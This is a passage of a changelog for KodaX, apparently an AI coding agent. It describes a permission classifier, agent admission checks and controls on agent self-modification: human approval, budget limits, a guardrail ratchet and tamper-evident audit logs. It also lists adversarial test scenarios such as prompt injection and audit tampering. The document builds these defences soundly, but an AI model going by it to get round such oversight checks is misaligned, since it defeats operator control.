+ **ACP scope note (v0.7.33)**: the canonical `'auto'` permission mode is **not** exposed over ACP. ACP clients see the legacy 3-mode set (`plan`, `accept-edits`, `auto-in-project`) — see code comment on `ACP_PERMISSION_MODE_IDS` in `src/acp_server.ts`. The classifier requires an interactive `askUser` surface (readline / Ink confirm dialog) and `KodaXAcpServer.requestPermissionFromClient` has no protocol slot for the classifier-escalate `<reason>` payload yet; an ACP-native classifier-escalate channel lands in a follow-up version. Until then, ACP's `'auto-in-project'` continues with the pre-v0.7.33 rules-only semantics.
324
+
325
+ ### Changed (BREAKING)
326
+
327
+ - **`LocalToolDefinition.toClassifierInput: (input: unknown) => string`** is now a **required** field (Phase 2b.1). Authors of custom tools (extensions via FEATURE_034, runtime construction via FEATURE_087) must supply a projection that the auto-mode classifier evaluates. Three-tier strategy:
328
+ - **Zero-risk (read-only / structural):** return `''` — Tier 1 short-circuits the classifier entirely (zero token cost). Examples: read, grep, glob, scaffold/validate/test of construction tools.
329
+ - **High-risk (mutation / network / exec / spawn):** custom projection surfacing the risk-bearing field. Examples: `Bash: ${i.command}`, `Write ${i.path} (${i.content.length} bytes)`, `WebFetch ${i.url}`, `ActivateTool: ${name}@${version}`.
330
+ - **Low-risk structured:** call `defaultToClassifierInput(name, input)` (one-line helper).
331
+
332
+ All 41 built-in tools migrated. The construction runtime falls back to `defaultToClassifierInput(artifact.name, input)` for constructed tools that don't yet declare a custom projection (a future artifact-schema field will let authors override). External extension authors must add the field to their `LocalToolDefinition` literals — see JSDoc on the field and the example collection at the top of `packages/coding/src/tools/classifier-projection.ts` for guidance.
333
+
334
+ ---
335
+
336
+ ## [0.7.32] - 2026-05-02
337
+
338
+ ### Theme
339
+
340
+ Two features close out v0.7.32 and the Plan B roadmap. **FEATURE_090** is the roadmap endpoint and the highest-risk feature in the self-construction series: it lets a constructed agent rewrite **itself**, gated by 5 reflexive stability guarantees (deferred resolver swap protecting the in-flight `Runner.run` reference; LLM diff summary advisory + force-ask-user dialog showing raw prev/next manifests; modification budget hardcoded at N=3 cross-run; chained rollback re-running admission; append-only audit log with diff hash). **FEATURE_107** is a data-driven architecture clean-up: the v0.7.16 design assumption "Planner → fresh Generator session + plan artifact" was never implemented in the v0.7.26 Layer A rewrite (all handoffs are `kind:'continuation'` with `inputFilter:undefined`). The 18-case `h2-plan-execute-boundary` eval (1 real-replay + 17 hand-curated, after Pool 3 archaeology demoted half the original candidate pool) reframed the question to A=current full-transcript vs B=add `inputFilter` to realize v0.7.16 intent. Across 6 alias × 3 cases the two paths produced **identical** Generator outcomes (0pp delta) — variant B is deleted, full-transcript stays, and the v0.7.16 design intent is formally retired. Two production changes ship from FEATURE_107's empirical findings: per-context-window adaptive `triggerPercent` (≤200K → 60%, ≤256K → 65%, ≤500K → 70%, >500K → 75%) because short-window models hit attention degradation around 120K and the legacy 75% default fires too late; and Generator reasoning-discipline (Claude Code's verbatim bidirectional bar for `emit_handoff`) hardcoded into `role-prompt.ts` after boundary suite confirmed it harmless across 6 aliases.
341
+
342
+ ### Added
343
+
344
+ - **FEATURE_090 — Self-Construction Tier 4: Agent Self-Modifying Role Spec**: A constructed agent (kind=`agent`, authored via `stage_agent_construction`) can now propose a new version of itself by calling the new internal tool `stage_self_modify`. The path enforces 5 stability guarantees:
345
+ - **G1 deferred resolver swap** — `agent-resolver.ts::_pendingSwap` queue holds activated-but-not-live entries; the in-flight `Runner.run` keeps the prior `Agent` reference until the conversation turn ends. REPL drains the queue at the `runAgentRound` `finally` boundary so the new version takes effect on the next turn (works for success, abort, and error paths).
346
+ - **G2 LLM diff summary + force-ask-user** — activate path computes a structured `{ severity, summary, flaggedConcerns }` via the same `LlmReviewClient` interface FEATURE_089 uses (graceful fallback `severity='major'` record when no client is wired). Force-ask-user dialog **always** shows raw prev/next instructions verbatim — the LLM summary is advisory, not load-bearing. Even global `auto-approve` policy is overridden on the self-modify path.
347
+ - **G3 modification budget** — `DEFAULT_SELF_MODIFY_BUDGET=3` hardcoded in `budget.ts`; on-disk file value is ignored and `count` clamped to `>=0` against tampering. Exhausted budget hard-rejects with rule `budget-exhausted`; operator unlocks via `kodax constructed reset-self-modify-budget <name>` (writes a `self_modify_budget_reset` audit row with OS user attribution).
348
+ - **G4 rollback** — `kodax constructed rollback <name>` revokes the current active and re-registers the next-most-recent active version on disk. **Chained**: a second rollback restores the version before that, and so on, back to the original first-time activation. Re-runs admission against the rollback target so a target that no longer admits (system caps tightened, invariants changed) cannot be silently re-registered. Prior versions stay at `status='active'` (not `'archived'`) so the chain has rollback targets.
349
+ - **G5 audit log** — JSONL append-only at `.kodax/constructed/_audit.jsonl` with one entry per lifecycle event (`self_modify_{staged,tested,activated,rejected,rolled_back,disabled,budget_reset}`), each carrying timestamp, agent, version pair, diff hash, severity, OS user, policy verdict, budget remaining, and reject reason. `computeDiffHash(prev, next)` recomputation against on-disk manifests detects post-activate tampering (covered by adversarial test 5).
350
+
351
+ 6 hard-reject rules in `validateSelfModify` (pure function): `name-changed | kind-invalid | guardrail-ratchet | reasoning-ceiling | budget-exhausted | self-modify-disabled`. Guardrail ratchet is the load-bearing safety check — new `guardrails` set must be a superset of the prior set (adding allowed, removing not). `kodax constructed disable-self-modify <name>` is permanent (no `enable` command by design): writes a marker file `_self_modify_disabled.json` that `validateSelfModify` consults; **presence-wins** semantics — tampering `disabled: false` into the file does not re-enable; malformed JSON treated as fail-safe disabled.
352
+
353
+ REPL bootstrap (`packages/repl/src/common/construction-bootstrap.ts`) wires `selfModifyAskUser` through the existing `activeAskUser` cell so the dialog renders LLM summary + severity + flagged concerns + raw prev/next instructions + budget snapshot. Without a bound askUser (ACP / single-shot CLI / child agents) self-modify activation hard-rejects — same defensive default as the regular construction policy.
354
+
355
+ **Tests**: 295 green across `validateSelfModify` (16) + `audit-log` + `budget` + `disable-state` + `rollback` + `self-modify-summary` (12) + `runtime-self-modify-activate` (8) + `agent-resolver-pending` (8) + `feature-090-adversarial.test.ts` (7 scenarios: prompt injection in instructions, ratchet violation, capability-tier escalation, recursive within-run self-modify, post-activate audit hash tampering, in-disguise via `stage_agent_construction`, tampered disable marker) + `self-modify-tool` + `self_modify_cli.test.ts` (14, CLIs end-to-end) + `construction-bootstrap.test.ts` (4, REPL wiring contract: bootstrap → activate → drain → next-run resolves new version).
356
+
357
+ **Surface**: top-level exports from `@kodax/coding` for `appendAuditEntry` / `readAuditEntries` / `readBudget` / `resetBudget` / `disableSelfModify` / `readDisableState` / `rollbackSelfModify` / `drainPendingSwaps` / `hasPendingSwap` / `resolveConstructedAgent` / `DEFAULT_SELF_MODIFY_BUDGET` + types `AgentArtifact` / `AuditEntry` / `BudgetState` / `DisableState` / `RollbackResult` / `SelfModifyAskUser` / `SelfModifyAskUserInput` / `SelfModifyDiffSummary` / `SelfModifyDiffSeverity`.
358
+
359
+ - **FEATURE_107 — AMA H2 Plan-Execute Boundary Eval** (architecture validation, not part of Plan B): Pre-registered eval answering whether the v0.7.16 design intent "Planner → fresh Generator session + plan artifact" was producing measurable Generator-quality benefits. **P1.0 candidate scan** (`benchmark/scan-h2-candidates.ts` against `~/.kodax/sessions/`): 533 sessions, 0 real H2 verdicts (confirms the FEATURE_107 telemetry pivot rationale), 45 candidates above heuristic threshold, only 28 with viable git SHAs for replay, only 5 with actual file mutation. **P1.5 dataset** (`benchmark/datasets/h2-plan-execute-boundary/`): 18 cases — 1 real-replay + 17 hand-curated across 5 categories (multi-file feature impl, cross-package refactor, multi-file bugfix, TDD multi-file). After Pool 3 archaeology and three rounds of self-audit (P1.5 / P1.5b / codex review with 3 HIGH + 3 MED + 2 LOW findings folded in), the dataset settled with explicit `mustTouchFiles` / `mustNotTouchFiles` golden signals + natural-language `acceptanceCriteria` for the LLM judge. **P2 harness** (~990 LOC under `benchmark/harness/`): `worktree-runner.ts` (git-worktree isolation envelope; 6/6 tests), `agent-task-runner.ts` (KodaX spawn with isolated HOME + variant-forcing env + binOverride), `h2-boundary-runner.ts` (cases × aliases × variants orchestrator with persisted `matrix.json`), `plan-intent-fidelity.ts` (LLM-as-judge for Generator deliverable vs Planner intent; 11/11 parser tests). **P2.1 source-side eval hooks** (~105 LOC, all tagged `// FEATURE_107 P2.1: DELETE WITH B-PATH IMPL AT P6`): `applyForcedHarness()` (`KODAX_FORCE_MAX_HARNESS` rewrites `plan.harnessProfile`), `stripPlannerReasoningForGenerator` `inputFilter` on `plannerHandoffs` (`KODAX_PLANNER_INPUTFILTER=strip-reasoning`). **Empirical conclusion**: H2-A (full Planner transcript) and H2-B (only `emit_contract` artifact) produce identical Generator outcomes across 6 aliases × 3 cases (0pp delta). Variant B `inputFilter` wiring + supporting code **deleted**; v0.7.16's "new session + plan artifact" design intent formally retired (full-transcript stays). Long-context suite (18 cells, 5 aliases) revealed **context-window length** (not raw model capability) is the dominant factor in long-context quality — short-window models (200-256K) hit attention degradation around 120K. Two production changes shipped from this finding: (a) **per-context-window adaptive `triggerPercent`** in `compaction-config.ts` (≤200K → 60%, ≤256K → 65%, ≤500K → 70%, >500K → 75%); user-explicit `triggerPercent` still wins. (b) **Generator reasoning-discipline** (Claude Code verbatim, bidirectional, "high bar" for `emit_handoff` blocked) hardcoded into `role-prompt.ts`; boundary suite confirmed harmless across 6 aliases. (c) Compaction trigger emits one stderr line per event (default-on, zero-cost observability).
360
+
361
+ ### Fixed
362
+
363
+ - **`bench` worktree drift detection** — `worktree-runner.ts` orphan scan now catches modifications to **tracked** files, not just untracked additions. Cleans up dead env wiring left over from the P2 design pass that the agent-task-runner never read.
364
+
365
+ ### Documentation
366
+
367
+ - **EVAL_GUIDELINES rewrite** — `benchmark/EVAL_GUIDELINES.md` now documents the **single-turn probe methodology** as the official KodaX eval pattern and removes end-to-end loop comparisons from the recommended set. Loops conflate prompt quality with tool-availability artefacts (model tries to verify with `read`/`grep`/`bash`, harness can't provide tools, benchmark scores the format-fail). Single-turn probes test the prompt-only contract.
368
+ - **FEATURE_108 design** (`docs/features/v0.7.47.md`) — Session-Driven Reflective Prompt Patcher spec landed for v0.7.47 design preview.
369
+ - **FEATURE_109 design** (`docs/features/v0.7.48.md`) — Harness Observability Substrate (long-term memory + prediction contract + cross-family prose guard) spec landed for v0.7.48 design preview.
370
+ - **`docs/features/v0.7.29.md` 1496-line expansion** — folds back the historical capability-inventory artifact (`v0.7.29-capability-inventory.md` deleted) and adds deeper FEATURE_103/104/107-related context to the v0.7.29 retrospective.
371
+ - **`docs/CODING_AGENT_PROMPTS.md`** — cross-project prompt-system reference (4 open-source coding agents) for KodaX prompt design comparison. Research artefact, not a project doc.
372
+ - **`docs/features/v0.7.32.md`** — FEATURE_090 design section drift-corrected against implementation: disable mechanism described as marker file (not allowed-tools removal); prior versions kept at `status='active'` for chained rollback (not `archived`); divergence detection rejected in favour of LLM diff summary; no instructions-keyword static check (intentional simplification — relies on operator + advisory `flaggedConcerns`). Operator-facing usage section integrated directly into the design doc (the standalone `FEATURE_090_USER_GUIDE.md` was deleted to comply with the docs structure rule).
373
+ - **`docs/FEATURE_LIST.md`** — `FEATURE_090` and `FEATURE_107` moved from "Planned" to "已完成 Feature" with `v0.7.32 (unreleased)` annotation; "Current released version" pointer advanced to `v0.7.32`; `各版本待做分布` v0.7.32 row dropped (no Planned features remain at this version). Tracker-consistency test green.
374
+
375
+ ### Tests
376
+
377
+ - 295 new tests across FEATURE_090 surface (construction unit + 4 CLI integration + 7 adversarial scenarios + 4 REPL bootstrap integration). Build green; FEATURE_090 + FEATURE_107 paths exercised end-to-end without regressions to FEATURE_087/088/089/100/101/106 surfaces. `tests/tracker-consistency.test.ts` 4/4 green after FEATURE_LIST.md sync.
378
+
379
+ ### Migration
380
+
381
+ - No user-facing migration. FEATURE_090's `stage_self_modify` tool is gated to `kind='agent'` constructed artifacts (builtin Scout / Planner / Generator / Evaluator can never self-modify by design — their declarations live in `@kodax/core` and are immutable). `selfModifyAskUser` defaults to `'reject'` on non-interactive surfaces (ACP / single-shot CLI / child agents), preserving the v0.7.28 invariant that self-construction requires explicit operator consent. FEATURE_107's `inputFilter` hooks are deleted with the B-path conclusion — no leftover plumbing. Adaptive compaction `triggerPercent` defaults change automatically on next REPL session start; user-explicit values in config still win. The `.kodax/constructed/_audit.jsonl` and `.kodax/constructed/agents/<name>/_self_modify*.json` files are created lazily on first self-modify event — no migration of existing constructed agents required.
382
+
383
+ ---
384
+
385
+ ## [0.7.31] - 2026-04-29
386
+
387
+ ### Theme
388
+
389
+ Three coupled features close out v0.7.31: **FEATURE_101** turns Layer A's structural "agent + handoffs + guardrails" types into an admission contract — `Runner.admit(manifest)` runs an 8-invariant 5-step audit before a manifest can boot; **FEATURE_089** lifts FEATURE_088 self-construction from tools to agents (5-step staircase: scaffold → validate → stage → test → activate), with sandbox runner + within-session re-admission gate at activate-time; **FEATURE_106** replaces v0.7.30's silent scope-reflection with a `ToolGuardrail`, rewrites the Scout role-prompt's quality framework (hard rule: "≥2 files OR start a project from scratch → must `emit_scout_verdict` BEFORE the first write"), and registers `harnessSelectionTiming` as the 8th admission invariant. Stage 1 benchmark across 8 coding-plan provider/model alias × 6 task × 2 prompt variant (96 cells, 11m29s wall-clock) drops the multi-file-H0 leakage rate from **15.6% → 0.0%** (acceptance gate ≤5%) with H1-class pass rate jumping +50 percentage points (37.5% → 87.5%) and `pre_emit_commitment_rate` 65.6% → 84.4% (≥70% gate). Stage 2 reasoning sweep (108 cells, 6 task × 3 alias × 2 prompt × 3 reasoning, 7m57s) shows reasoning depth has zero effect on multi_file_h0_rate (current: 8.3% across quick/balanced/deep; feature_106: 0.0% across all three) — reverses the v0.7.30 "reasoning ⇒ over-confident H0" hypothesis and grants FEATURE_103 reasoning `default=balanced` keep status on quantitative grounds, not assumption. Stage 3 production-fidelity eval (3 cells: real LLM × `createRolePrompt('scout', ...)` × `Runner.run` × mock mutation tools) closes the remaining gap: 3/3 alias (`zhipu/glm51` / `ds/v4pro` / `kimi`) all walk the **committed-early** path — Scout reads / greps to gather context, then calls `emit_scout_verdict({confirmed_harness:H1_EXECUTE_EVAL})` without writing any files. Guardrail does not need to fire because the production Scout prompt's "Do NOT do the implementation yourself for H1/H2 tasks" rule is honored upstream; zero `composition-fail` cells.
390
+
391
+ ### Added
392
+
393
+ - **FEATURE_101 — Constructed Agent Admission Contract (`Runner.admit`)**: New admission layer in `@kodax/core` turns structural agent manifests into runnable agents only after a 5-step audit passes. **Layer A surface**: `AgentManifest` + `InvariantId` + `ManifestPatch` (monotone: `tools` only narrows, `handoffs` only narrows, `maxBudget` only decreases) + `composePatches` (min-wins for budget, intersection for tools/handoffs) + `applyManifestPatch` (idempotent, monotonicity-checked) + `InvariantResult` discriminated union (`ok`/`reject`/`clamp(with patch)`/`warn`) + `QualityInvariant` 3-hook model (`admit`/`observe`/`assertTerminal`) + `AdmissionVerdict` (`ok+manifest+patches+warnings` | `reject+reason+retryable`). **5-step audit pipeline**: (1) schema-validate the manifest; (2) run each registered invariant's `admit` hook in declared order; (3) compose all returned patches, fail if any reject; (4) apply composed patch monotonically to manifest; (5) re-audit composed manifest to catch second-order rejects. **8 v1 invariants registered**: `finalOwner` (handoff graph terminates at a single owner), `handoffLegality` (no cycles, no orphan kinds), `evidenceTrail` (mutating tools imply at least one observer in the chain), `harnessSelectionTiming` (FEATURE_106's 8th invariant — H1/H2 mutation must precede `emit_scout_verdict`), `budgetCeiling` (declared `maxBudget` ≤ system cap), `toolPermission` (declared tools fall within capability tier whitelist; `bash:network` requires explicit override), `boundedRevise` (revisions are a finite chain, no unbounded retry loops), `independentReview` (if a `qa-reviewer` role appears, it must be a different name from the generator). **Capability classification**: `resolveToolCapability(name)` maps tool names to one of `read` / `edit` / `bash:test` / `bash:read-only` / `bash:mutating` / `bash:network` / `subagent` tiers. Repo-intel tools (`repo_overview` / `changed_scope` / etc.) classified as `read`; worktree / construction tools as `subagent`. **Layered architecture**: pure invariants in `packages/core/src/invariants/` (no `@kodax/coding` dep); capability-coupled invariants (`budget-ceiling` / `tool-permission` / `bounded-revise` / `independent-review`) in `packages/coding/src/agent-runtime/invariants/`. `registerCodingInvariants()` calls `registerCoreInvariants()` then layers the 4 capability-coupled ones. **Tests**: 51 new tests across 8 invariant test files + admission-runtime + admission-audit; all tests green. **HIGH fix during review-gate**: `invariantBindings` previously included unregistered ids, masking missing registrations as silent no-ops; filtered to ids where `getInvariant(id)` resolves so unknown declared ids surface as a clear retryable error.
394
+
395
+ - **FEATURE_089 — Self-Construction Tier 3: Agent Generation**: Mirrors FEATURE_088's tool construction staircase but produces `Agent` manifests instead of `KodaXToolDefinition`. Five new internal tools form the agent generation pipeline: `scaffold_agent` (emits a fillable `AgentArtifact` skeleton), `validate_agent` (dry-run admission audit on candidate JSON; no disk write), `stage_agent_construction` (persists under `.kodax/constructed/agents/<name>/<version>.json`), `test_agent` (manifest shape check + `Runner.admit` + sandbox-runner case execution against an injected LLM callback), `activate_agent` (invokes the construction policy gate, flips `status=active`, records contentHash, and registers the agent in the resolver so `Runner.run` can find it by name). **Discriminated union extension**: `ConstructionArtifact` widened from `tool` only to `tool | agent` (kind dispatch in helpers, no type-guards everywhere); `ToolArtifact` and `AgentArtifact` differ only in `kind` and `content` shape (`AgentContent` carries `instructions` + `tools[]` + `handoffs[]` + `reasoning` + `guardrails[]` + `model` + `provider` + `outputSchema` + `testCases[]` + `maxBudget` + `declaredInvariants[]`). **Admission bridge** (`admission-bridge.ts`): pure `buildAdmissionManifest({name, content})` lifts `AgentContent` (refs as strings) → `AgentManifest` (refs as structural `Agent` stubs) for `Runner.admit` consumption. **Resolver** (`agent-resolver.ts`): module-singleton `AGENT_REGISTRY` parallel to `TOOL_REGISTRY`; `registerConstructedAgent(artifact)` returns an unregister callback the `ConstructionRuntime` stores in its `_activated` map; tool refs lifted through `TOOL_REGISTRY` snapshot at activation time. **Sandbox runner** (`sandbox-runner.ts`): drives `testCases` through `Runner.run` with `Promise.race` wall-clock budget (default 30s; AbortSignal alone is advisory because Runner.run's LLM callback may not honor it). Each case graded against `expectMatch`/`expectNotMatch`/`expectFinalText`. **Within-session tampering closed**: `activate()` re-runs `Runner.admit` for kind=`agent` so a write tool overwriting the manifest between `test_agent` and `activate_agent` cannot bypass admission. **Tests**: 87 new tests across runtime-agent / agent-resolver / agent-runner-integration / sandbox-runner / admission-bridge / agent-construction; 185 total construction tests green.
396
+
397
+ ### Changed
398
+
399
+ - **FEATURE_106 — AMA Harness Selection Calibration**: Replaces v0.7.30's silent `scope-reflection` middleware (which split off a separate ToolGuardrail-like surface only on the FEATURE_084 path) with a unified `ToolGuardrail.afterTool` hook (`scope-aware-harness-guardrail.ts`), idempotent on `tracker.reflectionInjected`. **Scout role-prompt rewrite** (`packages/coding/src/task-engine/_internal/managed-task/role-prompt.ts`): the §QUALITY FRAMEWORK section is rewritten — H0 reframed from "default" to "Bounded mutation OR pure answer (≤1 file ≤30 lines mutation OR no file mutation at all)"; H0/H1/H2 examples now quantified (H1: ≥2 files OR >30 lines; H2: project from scratch / cross-module refactor); the subjective "SCOPE SELF-CHECK" replaced with a **SCOPE COMMITMENT (hard rule)**: "If you intend to write ≥2 files OR start a project from scratch, call `emit_scout_verdict({confirmed_harness: H1 or H2})` BEFORE the first write. The scope guardrail will surface belated commitments and slow you down." Declarative `Guardrail` markers on `scoutSpec`/`generatorSpec` in `coding-agents.ts`. `runner-driven.ts` wires `createScopeAwareHarnessGuardrail` into the AMA path. **`harnessSelectionTiming` invariant** registered as FEATURE_101's 8th: detects when the manifest declares H1/H2 work but the runtime trace shows the first mutation preceding the `emit_scout_verdict` tool call. **Eval (Stage 1)**: 96 cells × 8 alias / 6 task / 2 prompt variant × 1 run, 11m29s wall-clock. Multi-file H0 leakage rate **15.6% → 0.0%**, H1 class pass rate **37.5% → 87.5%** (+50pp), `pre_emit_commitment_rate` **65.6% → 84.4%** (hard rule eliminates all 5 wrong-harness cases). Apparent H0/H2 -12.5pp regressions are all benchmark-format failures from models trying to actually use `read`/`grep`/`bash` to verify lookup answers (correct production behavior, not classification errors); the harness can't provide tools, so those outputs lack a parseable `HARNESS:` line. Per-cell verification confirms zero new mispicks under `feature_106`. **Eval (Stage 2 reasoning sweep)**: 108 cells × 3 alias × 2 prompt × 3 reasoning (low/medium/high) × 1 run, 7m57s wall-clock. Reasoning depth has **zero effect on multi_file_h0_rate** (current: 8.3% / 8.3% / 8.3%; feature_106: 0.0% / 0.0% / 0.0%) — reverses v0.7.30's "deeper reasoning ⇒ over-confident H0" hypothesis. Per Eval Plan decision matrix ("三档差异在 noise 内 → 保留 FEATURE_103"), keep `default=balanced` / `max=deep` / `escalateOnRevise=false`. Harness extension to support per-call reasoning was 5 small edits in `benchmark/harness/harness.ts` (`provider.stream`'s 4th arg already accepted `KodaXReasoningRequest` since v0.7.0, harness just wasn't passing it).
400
+
401
+ - **`ConstructionRuntime` discriminated extension**: `runtime.ts::test()` and `registerActiveArtifact()` now dispatch on `artifact.kind`. `SUPPORTED_KINDS = ['tool', 'agent']`. Tool path is byte-identical to v0.7.30; agent path adds `testAgentArtifact` (admission bridge + sandbox) and `registerActiveAgentArtifact` (resolver wiring + revoke unregister). FEATURE_088 builders (`buildToolArtifact`) narrowed to `Partial<ToolArtifact> → ToolArtifact` so the discriminant is preserved through factory paths. No regressions: existing 49 runtime tests + 4 e2e tests continue to pass alongside the 87 new agent-side tests.
402
+
403
+ ### Tests
404
+
405
+ - 1,629 `@kodax/coding` tests pass (185 in `packages/coding/src/construction/` covering both tool and agent paths). `@kodax/core` admission test suite (51 tests) green. Full workspace build clean.
406
+
407
+ ### Migration
408
+
409
+ - No user-facing migration required. FEATURE_101's `Runner.admit()` is opt-in for callers building agents from a manifest; all existing `Runner.run()` paths in REPL / coding / mcp continue to work without change. FEATURE_089's 5 new construction tools are gated behind the same construction-policy permission gate as FEATURE_088's tool tools — non-interactive surfaces continue to reject activation by default. FEATURE_106's prompt rewrite ships in the production Scout role-prompt; restart of an active KodaX REPL session is sufficient to pick it up.
410
+
411
+ ### Post-release implementation completion patches (folded into v0.7.31 tag)
412
+
413
+ The v0.7.31 tag points at HEAD = `5456d9a`, which includes two post-release audit patches and one review follow-up on top of the original `9ef5aad` release commit. All three close silent-footgun gaps surfaced after the initial commit; none change documented v0.7.31 behavior. Captured here so the tag-to-release-notes correspondence is unambiguous.
414
+
415
+ #### v0.7.31.1 — FEATURE_101 implementation completion patch (commit `4668732`)
416
+
417
+ 8 admission-runtime wiring gaps closed:
418
+
419
+ - `admission-session.ts` — `setAdmittedAgentBindings` / `getAdmittedAgentBindings` WeakMap binding registry promoted from per-test scaffolding to first-class production primitive that carries `{bindings, manifest}` for the dispatch site to consult.
420
+ - `admission-metrics.ts` — `_incAdmitOk(clamped)` / `_incAdmitReject(retryable)` rate counters wired so `admission_clamp_rate` / `admission_reject_after_retry_rate` / `invariant_violation_rate` can be queried at runtime instead of computed from logs.
421
+ - `runner.ts` admit-time double-wrap fix — `buildSystemPrompt` no longer wraps a manifest's instructions twice when the manifest was already admitted (TRUSTED_HEADER + role spec + TRUSTED_FOOTER fence). Q6 baseline (5 tasks × 8 alias) re-verified post-fix at 40/40 cells 100/100.
422
+ - Runtime-clamp invariant hooks — `runner.ts`'s tool-result callback synchronously calls `invariantSession.recordMutation` so `evidenceTrail.observe` sees individual file events; `mutationTracker.files.size` exposed for threshold-class assertions.
423
+ - Same-batch handoff cycle detection — `handoffLegality.admit` now consults `ctx.stagedAgents` (in addition to `activatedAgents`) so two manifests staged together with `A→B` and `B→A` cannot slip through admission individually-each.
424
+ - Debug flag — `KODAX_ADMISSION_DEBUG=1` env triggers verbose admission audit logs for offline trace replay.
425
+ - Built-in handoff resolution — `Runner.admit` resolves built-in agent names (`generator`, `evaluator`, `planner`, `scout`) to the canonical specs in `coding-agents.ts` so a manifest declaring a handoff to one of them by name no longer rejects with "unknown target".
426
+ - Q3 retry-cap rollback — the v0.7.31.1 first-cut implementation added per-name `KODAX_ADMISSION_RETRY_CAP` env defense; threat-model audit confirmed it solved a non-existent threat (KodaX is single-user CLI, no retry-attack surface) and was over-engineered. Reverted before commit.
427
+
428
+ #### v0.7.31.2 — FEATURE_101/106 second implementation completion patch (commit `ff22562`)
429
+
430
+ 5 silent-footgun gaps closed:
431
+
432
+ - **SA mutation-reflection text rewrite (CAP-016)** — `packages/coding/src/agent-runtime/middleware/mutation-reflection.ts` removed the dead AMA-escalation hint that referenced `emit_managed_protocol`. Per ADR-003, SA mode is direct execution with no mid-run harness escalation; the legacy text was inherited from a pre-FEATURE_106 era and induced hallucinated tool calls in real models. New text is SA-self-review oriented (re-read diff / run typecheck/tests / suggest user re-run under AMA mode). Real-LLM benchmark across 8 coding-plan providers × 3 task scenarios shows **100% safety judges pass, zero hallucinated AMA tool calls**.
433
+ - **`toolPermission` classifier expansion** — 9 NEW tool names added to the `subagent` tier classification: 4 canonical AMA emit (`emit_scout_verdict` / `emit_contract` / `emit_handoff` / `emit_verdict`) + 5 FEATURE_089 staircase (`scaffold_agent` / `validate_agent` / `stage_agent_construction` / `test_agent` / `activate_agent`). Internal admission audit, not LLM-facing — no benchmark needed. +2 unit tests.
434
+ - **`independentReview` stagedAgents fallback** — `reachableNames` now consults `ctx.stagedAgents` so a same-batch staging where the planner's handoff captured a stub generator before the staged generator's full topology was scaffolded still admits correctly. Mirrors `handoffLegality`'s authoritative-resolution pattern (activated > staged > inline target). +1 unit test.
435
+ - **`registerActiveArtifact` exhaustiveness guard** — `const _exhaustive: never = artifact` assertion + throw added so a future tier-3 artifact kind cannot silently fall through. Defensive only.
436
+ - **`clampMaxIterations` real implementation** — added `AgentManifest.maxIterations` field (symmetric with `maxBudget`), `applyManifestPatch` apply branch (monotone, only narrows), and `Runner.run` min-wins wiring through the WeakMap binding registry: `getAdmittedAgentBindings(startAgent)?.manifest.maxIterations` against `RunOptions.maxToolLoopIterations`. **Scope: per-run, not per-agent** — the cap is read from the entry agent's manifest once before the tool loop; v1 admission audits at run entry only, no per-handoff reclamping. Successor agents share the entry cap as the run total. +2 unit tests + 5 integration tests in new `runner-iteration-clamp.test.ts`.
437
+
438
+ #### v0.7.31.2 review follow-up (commit `5456d9a`)
439
+
440
+ 5 documentation/comment-drift fixes from the post-commit independent review (no production behavior changes):
441
+
442
+ - `bounded-revise.ts` — comment claimed `AgentManifest` doesn't carry `maxIterations`; rewritten to explain v0.7.31.2 added the field + apply path + Runner.run wiring while clarifying that the invariant's own admit-time hook stays observe-only by design.
443
+ - `cap-016-mutation-reflection.contract.test.ts` — file header docstring's "six canonical lines" updated to the post-rewrite shape (header + senior-engineer rhetorical line + 3 self-review action lines).
444
+ - `benchmark/datasets/sa-mutation-reflection/README.md` — added a "Caveat on the safety-pass-rate claim" section: the simplified `SA_IDENTITY` prompt names the forbidden tools by name and the safety judges check for those same names, so 100% safety pass proves "system prompt + judge are in agreement", not that the new reflection text alone suppresses hallucination. cap-016 contract test (text doesn't seed forbidden names) is the load-bearing assurance.
445
+ - `docs/features/v0.7.31.md` §v0.7.31.2 — Fix #2 row now lists the 9 NEW tool names explicitly with a note that the v0.7.31.2 commit message body's per-name attribution was wrong (count is correct, attribution isn't); Fix #5 row gained a "Scope note" paragraph on per-run vs per-agent semantics.
446
+ - `runner.ts` (around line 490) — added the same scope-note inline at the iterationCap site, naming the change point a future v2 would modify (re-read `getAdmittedAgentBindings(handoffSignal.to)` at the handoff site) so reading the code alone tells you the cap is intentionally entry-agent-scoped, not an oversight.
447
+
448
+ ---
449
+
450
+ ## [0.7.30] - 2026-04-29
451
+
452
+ ### Theme
453
+
454
+ Cell-level diff renderer becomes the sole render path (FEATURE_057 Track F closes — legacy `log-update.js` factory + opt-out gate + 12 dead files retired, ~150 lines of `engine.js` rewritten to dispatch through `applyCellFrame` unconditionally). Bounded-memory runtime hardening lands as FEATURE_060 (Tier 1 caps `findLastFencedBlock` at a 128KB tail-window + transcript at `TRANSCRIPT_HARD_LINE_CAP = 100K` lines; Tier 2 ports claude-code's UUID-anchored 200-item cap + `useDeferredValue` + transcript-mode 30-message visible cap, restoring `kodax -c` resume responsiveness on Windows-SSH). Windows-SSH host detection (FEATURE_096, originally planned `v0.7.39`, migrated in) routes ConPTY hosts to a main-screen + spinner-preserved policy with the `KODAX_FULLSCREEN` three-state escape hatch. Three review-stage / hotfix patches before tag (Phase 6 cursor-visibility regression, `resetOutputTracking` not reseeding `prevFrame`, `outputToScreen` row-overflow crash) preserve byte-level invariants the legacy paths required.
455
+
456
+ ### Added
457
+
458
+ - **FEATURE_060 — Bounded-Memory Runtime + OOM Hardening (Tier 1 boundedness landed)**: Three concrete code changes plus 7 new regression tests pin the bounded-retention invariants the design called for. **Track 1 (managed-worker retention)**: `findLastFencedBlock` in `task-engine/_internal/managed-task/parse-helpers.ts` switched to a tail-only scan when text exceeds 128KB (`FENCED_BLOCK_SCAN_TAIL_THRESHOLD`). Managed-protocol fenced blocks are emitted at the end of LLM responses by convention (post-visible-text), so scanning the trailing 128KB instead of the full payload bounds regex cost on runaway/malformed LLM output (verbose-mode loops, repeated-injection attacks, malformed protocol streams). The `index` is mapped back to full-text coordinate space so callers using `text.slice(0, block.index)` continue to receive the correct visible-text prefix. **Track 2 (output-mode retention)**: removed the redundant `messages: [...result.messages]` spread at `runner-driven.ts:4747`. `result.messages` was already cloned at line 4676 from `runResult.messages`; spreading again here created a third full transcript copy in memory. `saveSessionSnapshot` doesn't mutate the passed array, so reference-passing is safe. **Track 3 (transcript boundedness)**: replaced `Number.POSITIVE_INFINITY` in `InkREPL.tsx:transcriptMaxLines` with `TRANSCRIPT_HARD_LINE_CAP = 100_000` (~10MB of materialized rows — orders of magnitude beyond any realistic interactive session). Added 